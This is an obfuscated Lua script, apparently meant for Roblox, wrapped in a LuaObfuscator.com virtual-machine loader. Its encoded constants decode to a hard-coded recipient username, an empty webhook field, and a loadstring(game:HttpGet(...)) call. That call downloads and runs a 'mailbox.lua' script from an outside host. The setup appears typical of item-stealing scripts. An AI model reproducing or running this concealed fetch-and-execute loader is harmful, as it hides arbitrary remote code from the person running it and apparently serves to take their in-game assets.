--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-((1 + 1) -1))))%(2^(((v33-1) -(v32-(1 -0))) + (2 -1))) ;return v82-(v82%1) ;else local v83=(621 -(555 + 64))^(v32-(932 -(857 + 12 + 62))) ;return (((v31%(v83 + v83))>=v83) and (569 -(367 + 201))) or (927 -(214 + 713)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (880 -(282 + 595)) );v19=v19 + (1641 -(1523 + 114)) ;return (v37 * (15077001 + (1701485 -(226 + 1044)))) + (v36 * (93426 -(121444 -93554))) + (v35 * (1321 -(68 + 997))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38~=0) then else v39=0;v40=nil;v38=1 -0 ;end if (v38==2) then v43=nil;v44=nil;v38=3;end if (v38==(1822 -(1483 + 338))) then v41=nil;v42=nil;v38=2;end if (v38~=(1698 -(1229 + 466))) then else v45=nil;v46=nil;v38=4;end if (4==v38) then while true do if (v39~=(578 -(386 + 192))) then else local v96=1206 -(696 + 510) ;while true do if (v96~=1) then else v39=1 -0 ;break;end if ((1262 -(1091 + 171))==v96) then v40=0;v41=nil;v96=1 + 0 ;end end end if (v39==(6 -4)) then v44=nil;v45=nil;v39=3;end if ((9 -6)~=v39) then else v46=nil;while true do if (v40==0) then local v100=374 -(123 + 251) ;local v101;while true do if (v100~=0) then else v101=0;while true do if (v101~=(4 -3)) then else v43={};v40=1;break;end if (v101==0) then v41={};v42={};v101=699 -(208 + 490) ;end end break;end end end if (v40==1) then v44={v41,v42,nil,v43};v45=v24();v46={};v40=1 + 1 ;end if (v40==(2 + 1)) then local v102=836 -(660 + 176) ;while true do if (v102==(0 + 0)) then for v147=203 -(14 + 188) ,v24() do v42[v147-1 ]=v29();end return v44;end end end if (v40~=(677 -(534 + 141))) then else local v103=0;while true do if (0==v103) then for v149=1,v45 do local v150=0;local v151;local v152;local v153;local v154;while true do if (v150~=1) then else v153=nil;v154=nil;v150=1 + 1 ;end if (v150==(0 + 0)) then v151=0 + 0 ;v152=nil;v150=1 -0 ;end if ((2 -0)==v150) then while true do if (v151==(0 -0)) then local v162=0;local v163;while true do if (v162~=0) then else v163=0 + 0 ;while true do if (0~=v163) then else local v174=0;while true do if (v174~=(0 + 0)) then else v152=0;v153=nil;v174=1;end if (v174~=1) then else v163=397 -(115 + 281) ;break;end end end if (v163~=(2 -1)) then else v151=1;break;end end break;end end end if (v151==1) then v154=nil;while true do if (v152==0) then local v164=0;local v165;while true do if (v164~=(0 + 0)) then else v165=0;while true do if (v165~=1) then else v152=2 -1 ;break;end if (v165==0) then local v175=0 -0 ;while true do if (v175~=(867 -(550 + 317))) then else v153=v22();v154=nil;v175=1 -0 ;end if (v175==(1 -0)) then v165=1;break;end end end end break;end end end if (v152~=1) then else if (v153==1) then v154=v22()~=(0 -0) ;elseif (v153==(287 -(134 + 151))) then v154=v25();elseif (v153~=3) then else v154=v26();end v46[v149]=v154;break;end end break;end end break;end end end v44[1668 -(970 + 695) ]=v22();v103=1;end if (v103~=(1 -0)) then else for v155=1991 -(582 + 1408) ,v24() do local v156=0;local v157;local v158;local v159;while true do if (v156==0) then v157=0 -0 ;v158=nil;v156=1;end if (v156==1) then v159=nil;while true do if (v157==(1 -0)) then while true do if (v158==(0 -0)) then v159=v22();if (v21(v159,1,1825 -(1195 + 629) )~=(0 -0)) then else local v167=241 -(187 + 54) ;local v168;local v169;local v170;local v171;local v172;local v173;while true do if (v167==(781 -(162 + 618))) then v170=nil;v171=nil;v167=2 + 0 ;end if (2==v167) then v172=nil;v173=nil;v167=3;end if ((2 + 1)~=v167) then else while true do if (v168==2) then v173=nil;while true do if (v169==(3 -1)) then while true do if (v170~=(2 -0)) then else local v177=0;local v178;while true do if (v177==(0 + 0)) then v178=1636 -(1373 + 263) ;while true do if (v178~=(1001 -(451 + 549))) then else v170=3;break;end if (v178~=(0 + 0)) then else if (v21(v172,1 -0 ,1 -0 )==1) then v173[1386 -(746 + 638) ]=v46[v173[2]];end if (v21(v172,2,1 + 1 )~=1) then else v173[3]=v46[v173[3]];end v178=1 -0 ;end end break;end end end if (v170==0) then local v179=0;local v180;local v181;while true do if (v179==1) then while true do if (v180==0) then v181=0;while true do if (v181==(342 -(218 + 123))) then v170=1582 -(1535 + 46) ;break;end if (v181==(0 + 0)) then local v195=0 + 0 ;local v196;while true do if (v195==0) then v196=0;while true do if (v196==0) then v171=v21(v159,2,3);v172=v21(v159,564 -(306 + 254) ,1 + 5 );v196=1;end if (v196~=(1 -0)) then else v181=1;break;end end break;end end end end break;end end break;end if (v179==(1467 -(899 + 568))) then v180=0 + 0 ;v181=nil;v179=1;end end end if (v170==3) then if (v21(v172,7 -4 ,3)==1) then v173[4]=v46[v173[4]];end v41[v155]=v173;break;end if (v170==1) then local v183=0;local v184;while true do if ((603 -(268 + 335))==v183) then v184=290 -(60 + 230) ;while true do if ((572 -(426 + 146))==v184) then v173={v23(),v23(),nil,nil};if (v171==(811 -(569 + 242))) then local v192=0 -0 ;local v193;local v194;while true do if (v192==(1 + 0)) then while true do if (v193==(1024 -(706 + 318))) then v194=1251 -(721 + 530) ;while true do if (v194==(1271 -(945 + 326))) then v173[7 -4 ]=v23();v173[4 + 0 ]=v23();break;end end break;end end break;end if (v192==0) then v193=0;v194=nil;v192=701 -(271 + 429) ;end end elseif (v171==(1 + 0)) then v173[3]=v24();elseif (v171==(1502 -(1408 + 92))) then v173[1089 -(461 + 625) ]=v24() -(2^16) ;elseif (v171~=(1291 -(993 + 295))) then else local v199=0;local v200;local v201;while true do if (v199==1) then while true do if (v200==(0 + 0)) then v201=1171 -(418 + 753) ;while true do if (v201==(0 + 0)) then v173[3]=v24() -(2^(2 + 14)) ;v173[4]=v23();break;end end break;end end break;end if (v199==0) then v200=0 + 0 ;v201=nil;v199=1;end end end v184=1;end if (1==v184) then v170=2;break;end end break;end end end end break;end if (1~=v169) then else local v176=0;while true do if (v176==(1 + 0)) then v169=531 -(406 + 123) ;break;end if (0==v176) then local v185=1769 -(1749 + 20) ;while true do if (v185~=(0 + 0)) then else v172=nil;v173=nil;v185=1323 -(1249 + 73) ;end if (v185==1) then v176=1 + 0 ;break;end end end end end if (v169~=0) then else v170=0;v171=nil;v169=1;end end break;end if (v168==(1145 -(466 + 679))) then v169=0 -0 ;v170=nil;v168=1;end if (v168==1) then v171=nil;v172=nil;v168=2;end end break;end if (v167==0) then v168=0 -0 ;v169=nil;v167=1901 -(106 + 1794) ;end end end break;end end break;end if (v157==0) then v158=0;v159=nil;v157=1 + 0 ;end end break;end end end v40=3;break;end end end end break;end if ((1 + 0)==v39) then local v97=0 -0 ;while true do if (v97~=1) then else v39=5 -3 ;break;end if ((114 -(4 + 110))~=v97) then else v42=nil;v43=nil;v97=1;end end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=585 -(57 + 527) ;local v50=(v21(v48,1428 -(41 + (1706 -(53 + 267))) ,(28 + 95) -(17 + 86) ) * ((2 + 0)^(70 -38))) + v47 ;local v51=v21(v48,434 -(15 + 398) ,31);local v52=((v21(v48,92 -60 )==1) and  -(167 -(122 + 44))) or (1 -0) ;if (v51==(0 -0)) then if (v50==0) then return v52 * (0 + 0) ;else local v89=(982 -(18 + 964)) + 0 ;while true do if ((0 -0)==v89) then v51=66 -(30 + 35) ;v49=0;break;end end end elseif (v51==(1407 + 640)) then return ((v50==(1257 -(1043 + 214))) and (v52 * ((3 -2)/((4561 -3349) -(323 + 515 + 374))))) or (v52 * NaN) ;end return v8(v52,v51-1023 ) * (v49 + (v50/((5 -3)^(632 -(361 + 219))))) ;end v26=nil;function v26(v53)local v54=(0 -0) + 0 ;local v55;local v56;while true do if (2==v54) then v56={};for v90=851 -(20 + 830) , #v55 do v56[v90]=v2(v1(v3(v55,v90,v90)));end v54=3 + 0 ;end if (v54==(129 -(116 + 10))) then return v6(v56);end if (v54==(0 + 0)) then v55=nil;if  not v53 then v53=v24();if (v53==(738 -((1389 -847) + (1747 -(1126 + 425))))) then return "";end end v54=1 -0 ;end if (v54==(1 + 0)) then v55=v3(v16,v19,(v19 + v53) -(1 + (405 -(118 + 287))) );v19=v19 + v53 ;v54=1 + 1 ;end end end v18=5;end if (v18==2) then function v22()local v57=377 -(142 + (1212 -(553 + 424))) ;local v58;while true do if (v57==(0 -0)) then v58=v1(v16,v19,v19);v19=v19 + (1122 -((222 -104) + 1003)) ;v57=2 -1 ;end if (v57==(1 + 0)) then return v58;end end end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + 2 + 0 );v19=v19 + 2 ;return (v60 * (254 + 2)) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v61,16));if v20 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v85,v20);v20=nil;v98=1;end end else return v85;end break;end end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=8) then if (v81<=3) then if (v81<=1) then if (v81==0) then local v104=v80[2];local v105,v106=v71(v78[v104](v13(v78,v104 + 1 ,v80[3])));v73=(v106 + v104) -1 ;local v107=0;for v134=v104,v73 do v107=v107 + 1 ;v78[v134]=v105[v107];end else local v108=v80[2];local v109=v78[v80[3]];v78[v108 + 1 ]=v109;v78[v108]=v109[v80[4]];end elseif (v81==2) then v78[v80[2]]=v80[3]~=0 ;else local v114=0;local v115;while true do if (v114==0) then v115=v80[2];v78[v115]=v78[v115](v13(v78,v115 + 1 ,v73));break;end end end elseif (v81<=5) then if (v81>4) then v78[v80[2]]();else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=6) then v78[v80[2]]();elseif (v81==7) then v78[v80[2]]=v64[v80[3]];else v78[v80[2]]=v80[3];end elseif (v81<=12) then if (v81<=10) then if (v81==9) then v78[v80[2]]=v64[v80[3]];else local v119=v80[2];v78[v119]=v78[v119](v13(v78,v119 + 1 ,v73));end elseif (v81>11) then do return;end else local v121=v80[2];local v122=v78[v80[3]];v78[v121 + 1 ]=v122;v78[v121]=v122[v80[4]];end elseif (v81<=14) then if (v81>13) then local v126=v80[2];local v127,v128=v71(v78[v126](v13(v78,v126 + 1 ,v80[3])));v73=(v128 + v126) -1 ;local v129=0;for v137=v126,v73 do v129=v129 + 1 ;v78[v137]=v127[v129];end else v78[v80[2]]=v80[3];end elseif (v81<=15) then v64[v80[3]]=v78[v80[2]];elseif (v81>16) then do return;end else v64[v80[3]]=v78[v80[2]];end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!083O0003083O00557365724E616D65030E3O004D61726B79726F626C6F3O783103073O00576562482O6F6B034O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C7561000D3O00120D3O00023O0012103O00013O00120D3O00043O0012103O00033O0012093O00053O001209000100063O00200B00010001000700120D000300084O0002000400016O000100044O00035O00022O00053O000100012O00113O00017O00",v9(),...);end
